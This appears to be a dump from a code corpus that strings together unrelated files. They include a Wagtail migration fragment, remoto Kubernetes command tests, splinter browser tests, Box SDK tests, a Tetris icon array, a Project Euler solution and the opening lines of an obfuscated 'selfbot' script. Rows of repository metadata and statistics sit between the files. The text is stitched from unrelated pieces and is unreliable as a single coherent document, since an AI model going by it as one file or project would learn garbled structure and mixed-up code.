field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='richtextpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
]
| 305.017857 | 2,272 | 0.730227 | 1,871 | 17,081 | 6.645644 | 0.056654 | 0.156587 | 0.23106 | 0.131736 | 0.96783 | 0.965417 | 0.965417 | 0.965417 | 0.965417 | 0.965417 | 0 | 0.00368 | 0.061296 | 17,081 | 55 | 2,273 | 310.563636 | 0.771797 | 0.002635 | 0 | 0.571429 | 1 | 0 | 0.162909 | 0.00135 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.163265 | 0 | 0.22449 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c779bf79d7f2c7e91fea5c4543f8cd5e0971a8df | 1,925 | py | Python | remoto/tests/backends/test_kubernetes.py | chombourger/remoto | 8dc32e21246f003f4fabd6cc2e06fed9d827e8b9 | [
"MIT"
] | 22 | 2015-01-30T07:47:00.000Z | 2021-09-15T01:39:01.000Z | remoto/tests/backends/test_kubernetes.py | chombourger/remoto | 8dc32e21246f003f4fabd6cc2e06fed9d827e8b9 | [
"MIT"
] | 42 | 2015-01-05T15:27:33.000Z | 2021-09-03T20:07:38.000Z | remoto/tests/backends/test_kubernetes.py | chombourger/remoto | 8dc32e21246f003f4fabd6cc2e06fed9d827e8b9 | [
"MIT"
] | 23 | 2015-01-02T22:06:42.000Z | 2022-03-24T17:09:40.000Z | from remoto.backends import kubernetes
class TestCommandTemplate(object):
def test_using_podname_only(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf')
tmpl = conn.command_template()
assert tmpl == ['kubectl', 'exec', '-i', 'rook-ceph-asdf', '--', '/bin/sh', '-c']
def test_using_namespace(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph')
tmpl = conn.command_template()
assert tmpl == [
'kubectl', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c'
]
def test_using_context(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', context='4')
tmpl = conn.command_template()
assert tmpl == [
'kubectl', '--context', '4', 'exec', '-i',
'rook-ceph-asdf', '--', '/bin/sh', '-c'
]
def test_using_context_and_namespace(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph', context='4')
tmpl = conn.command_template()
assert tmpl == [
'kubectl', '--context', '4', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c'
]
class TestCommand(object):
def test_podname_conn_appends(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph')
result = conn.cmd(['ceph', '--version'])
assert result == [
'kubectl', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c', 'ceph --version'
]
def test_namespace_appends(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph')
result = conn.cmd(['ceph', 'health'])
assert result == [
'kubectl', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c', 'ceph health'
]
| 36.320755 | 90 | 0.546494 | 205 | 1,925 | 5.034146 | 0.195122 | 0.155039 | 0.139535 | 0.22093 | 0.833333 | 0.833333 | 0.833333 | 0.736434 | 0.736434 | 0.665698 | 0 | 0.002784 | 0.253506 | 1,925 | 52 | 91 | 37.019231 | 0.715379 | 0 | 0 | 0.428571 | 0 | 0 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.02381 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c78f64402d9107c8ec502b5b91504ee4ec208443 | 9,035 | py | Python | tests/find_elements.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | 1 | 2016-09-21T19:32:47.000Z | 2016-09-21T19:32:47.000Z | tests/find_elements.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | null | null | null | tests/find_elements.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | 1 | 2019-12-02T15:19:07.000Z | 2019-12-02T15:19:07.000Z | # -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from splinter.driver import ElementAPI
from splinter.element_list import ElementList
class FindElementsTest(object):
def test_finding_by_css(self):
value = self.browser.find_by_css('h1').value
self.assertEqual('Example Header', value)
def test_finding_by_xpath(self):
value = self.browser.find_by_xpath('//h1').value
self.assertEqual('Example Header', value)
def test_finding_by_tag(self):
value = self.browser.find_by_tag('h1').value
self.assertEqual('Example Header', value)
def test_finding_by_value(self):
value = self.browser.find_by_value('M').value
id = self.browser.find_by_id('gender-m')
self.assertEqual(id.value, value)
def test_finding_by_text(self):
element = self.browser.find_by_text('Complex')
self.assertEqual(element.value, 'Complex')
def test_finding_by_id(self):
value = self.browser.find_by_id("firstheader").value
self.assertEqual('Example Header', value)
def test_finding_by_name(self):
value = self.browser.find_by_name('query').value
self.assertEqual('default value', value)
def test_finding_all_elements_by_css(self):
value = self.browser.find_by_css('h1')[0].value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_xpath(self):
value = self.browser.find_by_xpath('//h1')[0].value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_tag(self):
value = self.browser.find_by_tag('h1')[0].value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_id(self):
value = self.browser.find_by_id("firstheader").value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_name(self):
value = self.browser.find_by_name('query').value
self.assertEqual('default value', value)
def test_finding_all_links_by_text(self):
link = self.browser.find_link_by_text('Link for Example.com')[0]
self.assertEqual('http://example.com/', link['href'])
def test_finding_all_links_by_href(self):
link = self.browser.find_link_by_href('http://example.com/')[0]
self.assertEqual('http://example.com/', link['href'])
def test_finding_all_links_by_partial_href(self):
link = self.browser.find_link_by_partial_href('example.c')[0]
self.assertEqual('http://example.com/', link['href'])
def test_finding_all_links_by_partial_text(self):
link = self.browser.find_link_by_partial_text('FOO')[0]
self.assertEqual('http://localhost:5000/foo', link['href'])
def test_finding_last_element_by_css(self):
value = self.browser.find_by_css('h1').last.value
self.assertEqual('Example Last Header', value)
def test_finding_last_element_by_xpath(self):
value = self.browser.find_by_xpath('//h1').last.value
self.assertEqual('Example Last Header', value)
def test_finding_last_element_by_tag(self):
value = self.browser.find_by_tag('h1').last.value
self.assertEqual('Example Last Header', value)
def test_finding_last_element_by_id(self):
value = self.browser.find_by_id("firstheader").last.value
self.assertEqual('Example Header', value)
def test_last_element_is_same_than_first_element_in_find_by_id(self):
# a html page have contain one element by id
first = self.browser.find_by_id("firstheader").value
last = self.browser.find_by_id("firstheader").last.value
self.assertEqual(first, last)
def test_finding_last_element_by_name(self):
value = self.browser.find_by_name('input1').last.value
self.assertEqual('default last value', value)
def test_finding_last_link_by_text(self):
link = self.browser.find_link_by_text('Link for Example.com').last
self.assertEqual('http://example.com/last', link['href'])
def test_finding_last_link_by_href(self):
link = self.browser.find_link_by_href('http://example.com/').last
self.assertEqual('Link for last Example.com', link.text)
def test_finding_link_by_partial_href(self):
link = self.browser.find_link_by_partial_href('example.c').last
self.assertEqual('Link for last Example.com', link.text)
def test_finding_last_link_by_partial_text(self):
link = self.browser.find_link_by_partial_text('FOO').last
self.assertEqual('A wordier (and last) link to FOO', link.text)
def test_finding_element_by_css_using_slice(self):
value = self.browser.find_by_css('h1')[-1].value
self.assertEqual('Example Last Header', value)
def test_finding_element_by_xpath_using_slice(self):
value = self.browser.find_by_xpath('//h1')[-1].value
self.assertEqual('Example Last Header', value)
def test_finding_element_by_tag_using_slice(self):
value = self.browser.find_by_tag('h1')[-1].value
self.assertEqual('Example Last Header', value)
def test_finding_element_by_id_using_slice(self):
value = self.browser.find_by_id("firstheader")[-1].value
self.assertEqual('Example Header', value)
def test_all_elements_is_same_than_first_element_in_find_by_id(self):
# a html page have contain one element by id
first = self.browser.find_by_id("firstheader").value
some = self.browser.find_by_id("firstheader")[-1].value
self.assertEqual(first, some)
def test_finding_element_by_name_using_slice(self):
value = self.browser.find_by_name('input1')[-1].value
self.assertEqual('default last value', value)
def test_finding_link_by_text_using_slice(self):
link = self.browser.find_link_by_text('Link for Example.com')[-1]
self.assertEqual('http://example.com/last', link['href'])
def test_finding_link_by_href_using_slice(self):
"should find link by href using slice"
link = self.browser.find_link_by_href('http://example.com/')[-1]
self.assertEqual('Link for last Example.com', link.text)
def test_finding_links_by_text(self):
"should find links by text"
link = self.browser.find_link_by_text('Link for Example.com')
self.assertEqual('http://example.com/', link['href'])
def test_finding_links_by_href(self):
"should find links by href"
link = self.browser.find_link_by_href('http://example.com/')
self.assertEqual('http://example.com/', link['href'])
def test_find_by_css_in_element_context(self):
"should find elements by css in element context and should return splinter driver element"
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_css('h2')
self.assertEqual(decendent.text.strip(), 'inside')
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent[0], ElementAPI)
def test_find_by_xpath_in_element_context(self):
"should find elements by xpath in element context"
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_xpath("//h2")
self.assertEqual(decendent.text.strip(), 'inside')
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_name_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_name("upload")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_tag_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_tag("input")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_id_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_id("visible")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_value_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_value("crazy diamond")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_finding_by_text_in_element_context(self):
body = self.browser.find_by_tag('body')
element = body.find_by_text('Complex')
self.assertEqual(element.value, 'Complex')
| 42.41784 | 98 | 0.700941 | 1,232 | 9,035 | 4.855519 | 0.086851 | 0.049147 | 0.115346 | 0.096623 | 0.889 | 0.835339 | 0.816449 | 0.815112 | 0.761618 | 0.738549 | 0 | 0.006905 | 0.182512 | 9,035 | 212 | 99 | 42.617925 | 0.803006 | 0.053901 | 0 | 0.383648 | 0 | 0 | 0.147907 | 0 | 0 | 0 | 0 | 0 | 0.345912 | 1 | 0.27044 | false | 0 | 0.012579 | 0 | 0.289308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c79c911a02a7e6816199f100b0939328362f9712 | 115 | py | Python | holobot/framework/lifecycle/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | 1 | 2021-05-24T00:17:46.000Z | 2021-05-24T00:17:46.000Z | holobot/framework/lifecycle/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | 41 | 2021-03-24T22:50:09.000Z | 2021-12-17T12:15:13.000Z | holobot/framework/lifecycle/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | null | null | null | from .lifecycle_manager import LifecycleManager
from .lifecycle_manager_interface import LifecycleManagerInterface
| 38.333333 | 66 | 0.913043 | 11 | 115 | 9.272727 | 0.636364 | 0.254902 | 0.392157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069565 | 115 | 2 | 67 | 57.5 | 0.953271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c7f5e5cce74eb16d8d735c6c0bdd4a2d4b03656c | 2,979 | py | Python | test/unit/object/test_terms_of_service_user_status.py | jayneeljariwala/box-python-sdk | 39aa284c776817453e4a75533a7e0b5516c03752 | [
"Apache-2.0"
] | 367 | 2015-02-10T05:55:45.000Z | 2022-03-16T23:39:58.000Z | test/unit/object/test_terms_of_service_user_status.py | jayneeljariwala/box-python-sdk | 39aa284c776817453e4a75533a7e0b5516c03752 | [
"Apache-2.0"
] | 686 | 2015-02-10T01:21:28.000Z | 2022-03-31T11:40:22.000Z | test/unit/object/test_terms_of_service_user_status.py | jayneeljariwala/box-python-sdk | 39aa284c776817453e4a75533a7e0b5516c03752 | [
"Apache-2.0"
] | 260 | 2015-02-16T17:35:06.000Z | 2022-03-20T17:45:28.000Z | # coding: utf-8
from __future__ import unicode_literals
import json
from boxsdk.object.terms_of_service_user_status import TermsOfServiceUserStatus
from boxsdk.config import API
def test_get(test_terms_of_service_user_status, mock_box_session):
created_at = '2016-05-18T17:38:03-07:00',
expected_url = '{0}/terms_of_service_user_statuses/{1}'.format(API.BASE_API_URL, test_terms_of_service_user_status.object_id)
mock_box_session.get.return_value.json.return_value = {
'type': 'terms_of_service_user_status',
'id': test_terms_of_service_user_status.object_id,
'created_at': created_at
}
terms_of_service = test_terms_of_service_user_status.get()
mock_box_session.get.assert_called_once_with(expected_url, headers=None, params=None)
assert isinstance(terms_of_service, TermsOfServiceUserStatus)
assert terms_of_service.type == test_terms_of_service_user_status.object_type
assert terms_of_service.id == test_terms_of_service_user_status.object_id
assert terms_of_service.created_at == created_at
def test_accept(test_terms_of_service_user_status, mock_box_session):
expected_url = '{0}/terms_of_service_user_statuses/{1}'.format(API.BASE_API_URL, test_terms_of_service_user_status.object_id)
mock_box_session.put.return_value.json.return_value = {
'type': test_terms_of_service_user_status.object_type,
'id': test_terms_of_service_user_status.object_id,
'is_accepted': True
}
data = {'is_accepted': True}
terms_of_service_user_status = test_terms_of_service_user_status.accept()
mock_box_session.put.assert_called_once_with(expected_url, data=json.dumps(data), headers=None, params=None)
assert isinstance(terms_of_service_user_status, TermsOfServiceUserStatus)
assert terms_of_service_user_status.type == test_terms_of_service_user_status.object_type
assert terms_of_service_user_status.id == test_terms_of_service_user_status.object_id
assert terms_of_service_user_status.is_accepted is True
def test_reject(test_terms_of_service_user_status, mock_box_session):
expected_url = '{0}/terms_of_service_user_statuses/{1}'.format(API.BASE_API_URL, test_terms_of_service_user_status.object_id)
mock_box_session.put.return_value.json.return_value = {
'type': 'terms_of_service_user_status',
'id': test_terms_of_service_user_status.object_id,
'is_accepted': False
}
data = {'is_accepted': False}
terms_of_service_user_status = test_terms_of_service_user_status.reject()
mock_box_session.put.assert_called_once_with(expected_url, data=json.dumps(data), headers=None, params=None)
assert isinstance(terms_of_service_user_status, TermsOfServiceUserStatus)
assert terms_of_service_user_status.type == test_terms_of_service_user_status.object_type
assert terms_of_service_user_status.id == test_terms_of_service_user_status.object_id
assert terms_of_service_user_status.is_accepted is False
| 53.196429 | 129 | 0.806982 | 449 | 2,979 | 4.806236 | 0.138085 | 0.12975 | 0.2595 | 0.291937 | 0.848934 | 0.817424 | 0.790083 | 0.790083 | 0.790083 | 0.729379 | 0 | 0.009488 | 0.115475 | 2,979 | 55 | 130 | 54.163636 | 0.809488 | 0.004364 | 0 | 0.391304 | 0 | 0 | 0.090081 | 0.065789 | 0 | 0 | 0 | 0 | 0.326087 | 1 | 0.065217 | false | 0 | 0.086957 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1be591fee4a084667c4060b43e027a715175d6a2 | 780 | py | Python | tetris_cz19_multiplayer/icon.py | rushashell/cz19badge | 91be317bb0924f8eefec81ee1ebc19917f749771 | [
"MIT"
] | 1 | 2021-01-17T16:23:05.000Z | 2021-01-17T16:23:05.000Z | tetris_cz19_multiplayer/icon.py | rushashell/cz19badge | 91be317bb0924f8eefec81ee1ebc19917f749771 | [
"MIT"
] | null | null | null | tetris_cz19_multiplayer/icon.py | rushashell/cz19badge | 91be317bb0924f8eefec81ee1ebc19917f749771 | [
"MIT"
] | 1 | 2019-08-04T10:30:23.000Z | 2019-08-04T10:30:23.000Z | icon = ([0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000ffff, 0x0000ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000], 1) | 780 | 780 | 0.826923 | 66 | 780 | 9.772727 | 0.060606 | 1.333333 | 1.767442 | 2.108527 | 0.992248 | 0.992248 | 0.992248 | 0.992248 | 0.992248 | 0.992248 | 0 | 0.718487 | 0.084615 | 780 | 1 | 780 | 780 | 0.184874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.819462 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
40b61c8ad71c758538f4679f189bfae0d6e9c5a9 | 106 | py | Python | dataloader.py | aryanshomray/Image-Denoising | f8a02038ca2418ebdda6eab6ec266d60b9337a93 | [
"MIT"
] | 3 | 2019-12-24T10:50:27.000Z | 2022-02-27T08:51:24.000Z | dataloader.py | aryanshomray/Image-Denoising | f8a02038ca2418ebdda6eab6ec266d60b9337a93 | [
"MIT"
] | null | null | null | dataloader.py | aryanshomray/Image-Denoising | f8a02038ca2418ebdda6eab6ec266d60b9337a93 | [
"MIT"
] | null | null | null | import torch
from torch import nn
import torch.nn.functional as F
class Dataloader(nn.module):
pass
| 13.25 | 31 | 0.764151 | 17 | 106 | 4.764706 | 0.647059 | 0.271605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179245 | 106 | 7 | 32 | 15.142857 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.6 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
40d653c2b6ad1a84aacade807b05b4e47f8aed52 | 1,521 | py | Python | ProjectEuler_018.py | sperek27/Project-Euler | 9ed9eb4d3b492f646c6c7d80ba84e834c7b3d3e7 | [
"MIT"
] | null | null | null | ProjectEuler_018.py | sperek27/Project-Euler | 9ed9eb4d3b492f646c6c7d80ba84e834c7b3d3e7 | [
"MIT"
] | null | null | null | ProjectEuler_018.py | sperek27/Project-Euler | 9ed9eb4d3b492f646c6c7d80ba84e834c7b3d3e7 | [
"MIT"
] | null | null | null | triangle = [75, 95, 64, 17, 47, 82, 18, 35, 87, 10, 20, 4, 82, 47, 65, 19, 1, 23, 75, 3, 34, 88, 2, 77, 73, 7, 63, 67, 99, 65, 4, 28, 6, 16, 70, 92, 41, 41, 26, 56, 83, 40, 80, 70, 33, 41, 48, 72, 33, 47, 32, 37, 16, 94, 29, 53, 71, 44, 65, 25, 43, 91, 52, 97, 51, 14, 70, 11, 33, 28, 77, 73, 17, 78, 39, 68, 17, 57, 91, 71, 52, 38, 17, 14, 91, 43, 58, 50, 27, 29, 48, 63, 66, 4, 68, 89, 53, 67, 30, 73, 16, 69, 87, 40, 31, 4, 62, 98, 27, 23, 9, 70, 98, 73, 93, 38, 53, 60, 4, 23]
t = [[75, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[95, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[17, 47, 82, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[18, 35, 87, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[20, 4, 82, 47, 65, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[19, 1, 23, 75, 3, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[88, 2, 77, 73, 7, 63, 67, 0, 0, 0, 0, 0, 0, 0, 0],
[99, 65, 4, 28, 6, 16, 70, 92, 0, 0, 0, 0, 0, 0, 0],
[41, 41, 26, 56, 83, 40, 80, 70, 33, 0, 0, 0, 0, 0, 0],
[41, 48, 72, 33, 47, 32, 37, 16, 94, 29, 0, 0, 0, 0, 0],
[53, 71, 44, 65, 25, 43, 91, 52, 97, 51, 14, 0, 0, 0, 0],
[70, 11, 33, 28, 77, 73, 17, 78, 39, 68, 17, 57, 0, 0, 0],
[91, 71, 52, 38, 17, 14, 91, 43, 58, 50, 27, 29, 48, 0, 0],
[63, 66, 4, 68, 89, 53, 67, 30, 73, 16, 69, 87, 40, 31, 0],
[4, 62, 98, 27, 23, 9, 70, 98, 73, 93, 38, 53, 60, 4, 23]]
n=14
for a in range(0,14):
for i in range(0,n):
if t[14-a][i]>t[14-a][i+1]:
t[13-a][i]=t[13-a][i]+t[14-a][i]
else:
t[13-a][i]=t[13-a][i]+t[14-a][i+1]
n=n-1
print(t[0][0])
| 54.321429 | 480 | 0.434583 | 404 | 1,521 | 1.636139 | 0.212871 | 0.278366 | 0.354009 | 0.399395 | 0.835098 | 0.800303 | 0.770045 | 0.700454 | 0.645991 | 0.577912 | 0 | 0.533454 | 0.272847 | 1,521 | 27 | 481 | 56.333333 | 0.064195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.04 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
40f58ed27f47706b98039c389b61e46443f5ab52 | 4,181 | py | Python | TheAmaraSelfBot.py | novicered/TheAmaraSelfBot | 5133d4c7a814e83df6c84e8e40c4cccb557ff685 | [
"Unlicense"
] | null | null | null | TheAmaraSelfBot.py | novicered/TheAmaraSelfBot | 5133d4c7a814e83df6c84e8e40c4cccb557ff685 | [
"Unlicense"
] | null | null | null | TheAmaraSelfBot.py | novicered/TheAmaraSelfBot | 5133d4c7a814e83df6c84e8e40c4cccb557ff685 | [
"Unlicense"
] | null | null | null | from pytransform import pyarmor_runtime
pyarmor_runtime()
